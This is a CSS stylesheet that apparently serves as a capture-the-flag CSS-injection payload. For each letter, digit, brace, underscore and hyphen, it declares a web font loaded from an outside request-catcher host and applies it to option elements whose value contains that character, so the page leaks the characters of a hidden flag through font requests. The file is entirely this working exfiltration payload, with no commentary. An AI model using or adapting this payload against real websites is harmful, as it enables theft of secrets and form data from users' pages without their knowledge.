@charset "UTF-8";

option {
    display: block !important;
    visibility: visible !important;
}

@font-face {
    font-family: "flag-a";
    src: url("https://css_task_test.requestcatcher.com/flag?a");
}
option[value*="a"] {
    font-family: "flag-a";
}

@font-face {
    font-family: "flag-b";
    src: url("https://css_task_test.requestcatcher.com/flag?b");
}
option[value*="b"] {
    font-family: "flag-b";
}

@font-face {
    font-family: "flag-c";
    src: url("https://css_task_test.requestcatcher.com/flag?c");
}
option[value*="c"] {
    font-family: "flag-c";
}

@font-face {
    font-family: "flag-d";
    src: url("https://css_task_test.requestcatcher.com/flag?d");
}
option[value*="d"] {
    font-family: "flag-d";
}

@font-face {
    font-family: "flag-e";
    src: url("https://css_task_test.requestcatcher.com/flag?e");
}
option[value*="e"] {
    font-family: "flag-e";
}

@font-face {
    font-family: "flag-f";
    src: url("https://css_task_test.requestcatcher.com/flag?f");
}
option[value*="f"] {
    font-family: "flag-f";
}

@font-face {
    font-family: "flag-g";
    src: url("https://css_task_test.requestcatcher.com/flag?g");
}
option[value*="g"] {
    font-family: "flag-g";
}

@font-face {
    font-family: "flag-h";
    src: url("https://css_task_test.requestcatcher.com/flag?h");
}
option[value*="h"] {
    font-family: "flag-h";
}

@font-face {
    font-family: "flag-i";
    src: url("https://css_task_test.requestcatcher.com/flag?i");
}
option[value*="i"] {
    font-family: "flag-i";
}

@font-face {
    font-family: "flag-j";
    src: url("https://css_task_test.requestcatcher.com/flag?j");
}
option[value*="j"] {
    font-family: "flag-j";
}

@font-face {
    font-family: "flag-k";
    src: url("https://css_task_test.requestcatcher.com/flag?k");
}
option[value*="k"] {
    font-family: "flag-k";
}

@font-face {
    font-family: "flag-l";
    src: url("https://css_task_test.requestcatcher.com/flag?l");
}
option[value*="l"] {
    font-family: "flag-l";
}

@font-face {
    font-family: "flag-m";
    src: url("https://css_task_test.requestcatcher.com/flag?m");
}
option[value*="m"] {
    font-family: "flag-m";
}

@font-face {
    font-family: "flag-n";
    src: url("https://css_task_test.requestcatcher.com/flag?n");
}
option[value*="n"] {
    font-family: "flag-n";
}

@font-face {
    font-family: "flag-o";
    src: url("https://css_task_test.requestcatcher.com/flag?o");
}
option[value*="o"] {
    font-family: "flag-o";
}

@font-face {
    font-family: "flag-p";
    src: url("https://css_task_test.requestcatcher.com/flag?p");
}
option[value*="p"] {
    font-family: "flag-p";
}

@font-face {
    font-family: "flag-q";
    src: url("https://css_task_test.requestcatcher.com/flag?q");
}
option[value*="q"] {
    font-family: "flag-q";
}

@font-face {
    font-family: "flag-r";
    src: url("https://css_task_test.requestcatcher.com/flag?r");
}
option[value*="r"] {
    font-family: "flag-r";
}

@font-face {
    font-family: "flag-s";
    src: url("https://css_task_test.requestcatcher.com/flag?s");
}
option[value*="s"] {
    font-family: "flag-s";
}

@font-face {
    font-family: "flag-t";
    src: url("https://css_task_test.requestcatcher.com/flag?t");
}
option[value*="t"] {
    font-family: "flag-t";
}

@font-face {
    font-family: "flag-u";
    src: url("https://css_task_test.requestcatcher.com/flag?u");
}
option[value*="u"] {
    font-family: "flag-u";
}

@font-face {
    font-family: "flag-v";
    src: url("https://css_task_test.requestcatcher.com/flag?v");
}
option[value*="v"] {
    font-family: "flag-v";
}

@font-face {
    font-family: "flag-w";
    src: url("https://css_task_test.requestcatcher.com/flag?w");
}
option[value*="w"] {
    font-family: "flag-w";
}

@font-face {
    font-family: "flag-x";
    src: url("https://css_task_test.requestcatcher.com/flag?x");
}
option[value*="x"] {
    font-family: "flag-x";
}

@font-face {
    font-family: "flag-y";
    src: url("https://css_task_test.requestcatcher.com/flag?y");
}
option[value*="y"] {
    font-family: "flag-y";
}

@font-face {
    font-family: "flag-z";
    src: url("https://css_task_test.requestcatcher.com/flag?z");
}
option[value*="z"] {
    font-family: "flag-z";
}

@font-face {
    font-family: "flag-0";
    src: url("https://css_task_test.requestcatcher.com/flag?0");
}
option[value*="0"] {
    font-family: "flag-0";
}

@font-face {
    font-family: "flag-1";
    src: url("https://css_task_test.requestcatcher.com/flag?1");
}
option[value*="1"] {
    font-family: "flag-1";
}

@font-face {
    font-family: "flag-2";
    src: url("https://css_task_test.requestcatcher.com/flag?2");
}
option[value*="2"] {
    font-family: "flag-2";
}

@font-face {
    font-family: "flag-3";
    src: url("https://css_task_test.requestcatcher.com/flag?3");
}
option[value*="3"] {
    font-family: "flag-3";
}

@font-face {
    font-family: "flag-4";
    src: url("https://css_task_test.requestcatcher.com/flag?4");
}
option[value*="4"] {
    font-family: "flag-4";
}

@font-face {
    font-family: "flag-5";
    src: url("https://css_task_test.requestcatcher.com/flag?5");
}
option[value*="5"] {
    font-family: "flag-5";
}

@font-face {
    font-family: "flag-6";
    src: url("https://css_task_test.requestcatcher.com/flag?6");
}
option[value*="6"] {
    font-family: "flag-6";
}

@font-face {
    font-family: "flag-7";
    src: url("https://css_task_test.requestcatcher.com/flag?7");
}
option[value*="7"] {
    font-family: "flag-7";
}

@font-face {
    font-family: "flag-8";
    src: url("https://css_task_test.requestcatcher.com/flag?8");
}
option[value*="8"] {
    font-family: "flag-8";
}

@font-face {
    font-family: "flag-9";
    src: url("https://css_task_test.requestcatcher.com/flag?9");
}
option[value*="9"] {
    font-family: "flag-9";
}

@font-face {
    font-family: "flag-{";
    src: url("https://css_task_test.requestcatcher.com/flag?%7B");
}
option[value*="\{"] {
    font-family: "flag-{";
}

@font-face {
    font-family: "flag-}";
    src: url("https://css_task_test.requestcatcher.com/flag?%7D");
}
option[value*="\}"] {
    font-family: "flag-}";
}

@font-face {
    font-family: "flag-_";
    src: url("https://css_task_test.requestcatcher.com/flag?_");
}
option[value*="_"] {
    font-family: "flag-_";
}

@font-face {
    font-family: "flag--";
    src: url("https://css_task_test.requestcatcher.com/flag?-");
}
option[value*="-"] {
    font-family: "flag--";
}
